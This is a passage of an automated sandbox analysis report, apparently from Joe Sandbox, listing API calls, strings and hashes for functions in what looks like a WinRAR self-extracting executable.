                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Item$TextWindow$Dialog
                                                                          • String ID: LICENSEDLG
                                                                          • API String ID: 3214253823-2177901306
                                                                          • Opcode ID: 622cd6d5a148c104d13d9ed5202f29d4ea7053f8f9b1076f15411e484401da25
                                                                          • Instruction ID: a6ef0dfdd6b06457418c884fc95288bb8f68f788e97d6ade4a8833ec5de1d21b
                                                                          • Opcode Fuzzy Hash: 622cd6d5a148c104d13d9ed5202f29d4ea7053f8f9b1076f15411e484401da25
                                                                          • Instruction Fuzzy Hash: 9A21E732A0421CFBD211AF65ED4DFBB3B7CEB57B55F010054FA01920A0CB969A45B631
                                                                          Function 00F1FD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,B62175CD,00000001,00000000,00000000,?,?,00F0AF6C,ROOT\CIMV2), ref: 00F1FD99
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00F0AF6C,ROOT\CIMV2), ref: 00F1FE14
                                                                          • SysAllocString.OLEAUT32(00000000), ref: 00F1FE1F
                                                                          • _com_issue_error.COMSUPP ref: 00F1FE48
                                                                          • _com_issue_error.COMSUPP ref: 00F1FE52
                                                                          • GetLastError.KERNEL32(80070057,B62175CD,00000001,00000000,00000000,?,?,00F0AF6C,ROOT\CIMV2), ref: 00F1FE57
                                                                          • _com_issue_error.COMSUPP ref: 00F1FE6A
                                                                          • GetLastError.KERNEL32(00000000,?,?,00F0AF6C,ROOT\CIMV2), ref: 00F1FE80
                                                                          • _com_issue_error.COMSUPP ref: 00F1FE93
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                          • String ID:
                                                                          • API String ID: 1353541977-0
                                                                          • Opcode ID: 39c22829a177aa9280dc6d1b5f7cc4edcf53b8bb5c110a553fe64f7eadce2e47
                                                                          • Instruction ID: c6944676e074a2e5c6491aaee8a0603ec527195909664c728519165da2d2a382
                                                                          • Opcode Fuzzy Hash: 39c22829a177aa9280dc6d1b5f7cc4edcf53b8bb5c110a553fe64f7eadce2e47
                                                                          • Instruction Fuzzy Hash: C341EAB1E00219ABC710DF64DC45BEFBBA9EB44730F104239F905E7291D7399988ABE5
                                                                          Function 00F0AF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: H_prolog
                                                                          • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                          • API String ID: 3519838083-3505469590
                                                                          • Opcode ID: afc07c81f120f4db1f43386d08a9bc67d9e2b7a3e16ced4f8a5e2f79640f947f
                                                                          • Instruction ID: 69a73739c7544e8e96517799942e2f8fb45a39efaf658a14a70778f9fb9f2b59
                                                                          • Opcode Fuzzy Hash: afc07c81f120f4db1f43386d08a9bc67d9e2b7a3e16ced4f8a5e2f79640f947f
                                                                          • Instruction Fuzzy Hash: 24715A71A00219EFDF14DFA4CC95AAFB7B9FF49721B14015DE512A72A0CB30AE41EB60
                                                                          Function 00F09382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 00F09387
                                                                          • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00F093AA
                                                                          • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00F093C9
                                                                            • Part of subcall function 00F0C29A: _wcslen.LIBCMT ref: 00F0C2A2
                                                                            • Part of subcall function 00F11FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00F0C116,00000000,.exe,?,?,00000800,?,?,?,00F18E3C), ref: 00F11FD1
                                                                          • _swprintf.LIBCMT ref: 00F09465
                                                                            • Part of subcall function 00F04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F040A5
                                                                          • MoveFileW.KERNEL32(?,?), ref: 00F094D4
                                                                          • MoveFileW.KERNEL32(?,?), ref: 00F09514
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                          • String ID: rtmp%d
                                                                          • API String ID: 3726343395-3303766350
                                                                          • Opcode ID: 4607d6003af9c79b626900dfa70541a8b47d61d01a21908a68e0bf35823ba6c7
                                                                          • Instruction ID: 372c9461d6dc86897b38b67dc823422a4092958bd6b0f8d3caccf43a627954c1
                                                                          • Opcode Fuzzy Hash: 4607d6003af9c79b626900dfa70541a8b47d61d01a21908a68e0bf35823ba6c7
                                                                          • Instruction Fuzzy Hash: D44185B190425866CF21EB61CD45EEE737CAF40354F0448A5B649E3092FB7C8BC9BB60
                                                                          Function 00F11218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __aulldiv.LIBCMT ref: 00F1122E
                                                                            • Part of subcall function 00F0B146: GetVersionExW.KERNEL32(?), ref: 00F0B16B
                                                                          • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00F11251
                                                                          • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00F11263
                                                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00F11274
                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F11284
                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F11294
                                                                          • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00F112CF
                                                                          • __aullrem.LIBCMT ref: 00F11379
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                          • String ID:
                                                                          • API String ID: 1247370737-0
                                                                          • Opcode ID: 7439c579bef5d9fd4f229ff8944926f94f66a69c8446025e41b13d910d79ac95
                                                                          • Instruction ID: c87f1acfdb33275c0de95dc6d3df1db758ac0b924f1c46ee98b30607a36bb328
                                                                          • Opcode Fuzzy Hash: 7439c579bef5d9fd4f229ff8944926f94f66a69c8446025e41b13d910d79ac95
                                                                          • Instruction Fuzzy Hash: F34109B1908345AFC710DF65C8849ABBBF9FF88314F00892EF596C2650E738E659DB51
                                                                          Function 00F02210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _swprintf.LIBCMT ref: 00F02536
                                                                            • Part of subcall function 00F04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F040A5
                                                                            • Part of subcall function 00F105DA: _wcslen.LIBCMT ref: 00F105E0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                          • String ID: ;%u$x%u$xc%u
                                                                          • API String ID: 3053425827-2277559157
                                                                          • Opcode ID: 9b60b61b8c2d370150cec7c326c11710dfd962f5668d63d1bd01a596f32987e1
                                                                          • Instruction ID: 69d29318a784b915324e331282061c3b9a55081812c7d568c6d8309dc3ce5c26
                                                                          • Opcode Fuzzy Hash: 9b60b61b8c2d370150cec7c326c11710dfd962f5668d63d1bd01a596f32987e1
                                                                          • Instruction Fuzzy Hash: BFF13B71A043809BDB25DB24C899BFE77D56F90300F08456DED869B2C3CB689945F7B2
                                                                          Function 00F19CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen
                                                                          • String ID: </p>$</style>$<br>$<style>$>
                                                                          • API String ID: 176396367-3568243669
                                                                          • Opcode ID: d90fcfefe1d54c38fcc0a48e105d90a831a482599a28792864f05a65c16f0114
                                                                          • Instruction ID: 3d0e99beeb35166d6227c8fc5e776455bb8ddbed5836649509428b0280a59358
                                                                          • Opcode Fuzzy Hash: d90fcfefe1d54c38fcc0a48e105d90a831a482599a28792864f05a65c16f0114
                                                                          • Instruction Fuzzy Hash: 5851C866E4832295DB349A15EC317F673E1DFA1770F59041AE9C18B1C0FAE58DC1A3E1
                                                                          Function 00F2F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00F2FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00F2F6CF
                                                                          • __fassign.LIBCMT ref: 00F2F74A
                                                                          • __fassign.LIBCMT ref: 00F2F765
                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00F2F78B
                                                                          • WriteFile.KERNEL32(?,00000000,00000000,00F2FE02,00000000,?,?,?,?,?,?,?,?,?,00F2FE02,00000000), ref: 00F2F7AA
                                                                          • WriteFile.KERNEL32(?,00000000,00000001,00F2FE02,00000000,?,?,?,?,?,?,?,?,?,00F2FE02,00000000), ref: 00F2F7E3
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                          • String ID:
                                                                          • API String ID: 1324828854-0
                                                                          • Opcode ID: f04942e16327f3aaa6c4e470613eae96a9b55961b090a73e34a66487f59a7b6a
                                                                          • Instruction ID: dfa69d541a43e1ed4253dc79a32aa6695ebdaa9143b25cd0c2fc3ccb14dcc2de
                                                                          • Opcode Fuzzy Hash: f04942e16327f3aaa6c4e470613eae96a9b55961b090a73e34a66487f59a7b6a
                                                                          • Instruction Fuzzy Hash: FE51B4B1D102599FDB10CFA8EC85AEEFBF8EF08310F14416AE551E7251E670AA44DBA0
                                                                          Function 00F22900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _ValidateLocalCookies.LIBCMT ref: 00F22937
                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00F2293F
                                                                          • _ValidateLocalCookies.LIBCMT ref: 00F229C8
                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00F229F3
                                                                          • _ValidateLocalCookies.LIBCMT ref: 00F22A48
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                          • String ID: csm
                                                                          • API String ID: 1170836740-1018135373
                                                                          • Opcode ID: c2fc488f466d5a205c4e0c3ad8d7c37b299b58a6155de05973d40a3b40b6e0c2
                                                                          • Instruction ID: 61b888e12e1754df65ee1817e15a99cf423dc80acde63b1eb8443870bb61c0e7
                                                                          • Opcode Fuzzy Hash: c2fc488f466d5a205c4e0c3ad8d7c37b299b58a6155de05973d40a3b40b6e0c2
                                                                          • Instruction Fuzzy Hash: 9F41B234E00228AFCF10DF68D881A9EBBB5EF45334F148065E815AB392D739DA45EF91
                                                                          Function 00F19ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ShowWindow.USER32(?,00000000), ref: 00F19EEE
                                                                          • GetWindowRect.USER32(?,00000000), ref: 00F19F44
                                                                          • ShowWindow.USER32(?,00000005,00000000), ref: 00F19FDB
                                                                          • SetWindowTextW.USER32(?,00000000), ref: 00F19FE3
                                                                          • ShowWindow.USER32(00000000,00000005), ref: 00F19FF9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Show$RectText
                                                                          • String ID: RarHtmlClassName
                                                                          • API String ID: 3937224194-1658105358
                                                                          • Opcode ID: a2dd0a7596b7f54dcf80da9e2fac6bdf30c9c8482291f3c9c391c0f2d3f41f58
                                                                          • Instruction ID: 54d73c2cc16e5ee629acd07e08a1b8bd8bad9372c704e221945301d06728bec5
                                                                          • Opcode Fuzzy Hash: a2dd0a7596b7f54dcf80da9e2fac6bdf30c9c8482291f3c9c391c0f2d3f41f58
                                                                          • Instruction Fuzzy Hash: 7A41F332808314FFCB215F64DC48BAB7BA8FF49721F004558F85999056CBB4DA59EBA1
                                                                          Function 00F19955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen
                                                                          • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                          • API String ID: 176396367-3743748572
                                                                          • Opcode ID: b31feefa30e948110d92bc803fa29e70478f649a47971c14d0be0100ca7e8a0d
                                                                          • Instruction ID: 2a2faed55bf35c2cd5212e9c5cfe88ed0bde4d1d2574c0fc0f219aa8bec5fa25
                                                                          • Opcode Fuzzy Hash: b31feefa30e948110d92bc803fa29e70478f649a47971c14d0be0100ca7e8a0d
                                                                          • Instruction Fuzzy Hash: 23315072A4834555DA30AF546C52BF673A4EF50730F60441EF48287280FADDBEC8A3E1
                                                                          Function 00F2C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00F2C868: _free.LIBCMT ref: 00F2C891
                                                                          • _free.LIBCMT ref: 00F2C8F2
                                                                            • Part of subcall function 00F28DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00F2C896,?,00000000,?,00000000,?,00F2C8BD,?,00000007,?,?,00F2CCBA,?), ref: 00F28DE2
                                                                            • Part of subcall function 00F28DCC: GetLastError.KERNEL32(?,?,00F2C896,?,00000000,?,00000000,?,00F2C8BD,?,00000007,?,?,00F2CCBA,?,?), ref: 00F28DF4
                                                                          • _free.LIBCMT ref: 00F2C8FD
                                                                          • _free.LIBCMT ref: 00F2C908
                                                                          • _free.LIBCMT ref: 00F2C95C
                                                                          • _free.LIBCMT ref: 00F2C967
                                                                          • _free.LIBCMT ref: 00F2C972
                                                                          • _free.LIBCMT ref: 00F2C97D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                          • String ID:
                                                                          • API String ID: 776569668-0
                                                                          • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                          • Instruction ID: 89bfa1250ec5b3d219efe196ed0e0bd403535e244598ea3ba0be1a003045a69a
                                                                          • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                          • Instruction Fuzzy Hash: CB113671582724B6E520B771EC07FCF7BAC9F04B00F504C15B2DD660A2DA7DB50AAB90
                                                                          Function 00F1E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00F1E669,00F1E5CC,00F1E86D), ref: 00F1E605
                                                                          • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00F1E61B
                                                                          • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00F1E630
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$HandleModule
                                                                          • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                          • API String ID: 667068680-1718035505
                                                                          • Opcode ID: fecffa35e1df753ddabeded7646e7d07f064a4857fb809871b1c6dd35f4a0ca0
                                                                          • Instruction ID: 64aa11676b4a44fa23cee3b72a3a3c7cc8d16c0a3cce0254bf46af9a685783d3
                                                                          • Opcode Fuzzy Hash: fecffa35e1df753ddabeded7646e7d07f064a4857fb809871b1c6dd35f4a0ca0
                                                                          • Instruction Fuzzy Hash: 6FF0F672FA0226DB8F218F649C84AEA32C96E657B93480539DD05D3110EB50CCD0BF91
                                                                          Function 00F1146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F114C2
                                                                            • Part of subcall function 00F0B146: GetVersionExW.KERNEL32(?), ref: 00F0B16B
                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F114E6
                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F11500
                                                                          • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00F11513
                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F11523
                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F11533
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Time$File$System$Local$SpecificVersion
                                                                          • String ID:
                                                                          • API String ID: 2092733347-0
                                                                          • Opcode ID: 3d270bfddb83c544162fc7c6deca2b54a2f8945b00eb949ddb9690125ffe8c77
                                                                          • Instruction ID: 5526b3d732c289f3a95eee9f1b44d8c05c4b1bb530d945174cec41e373674438
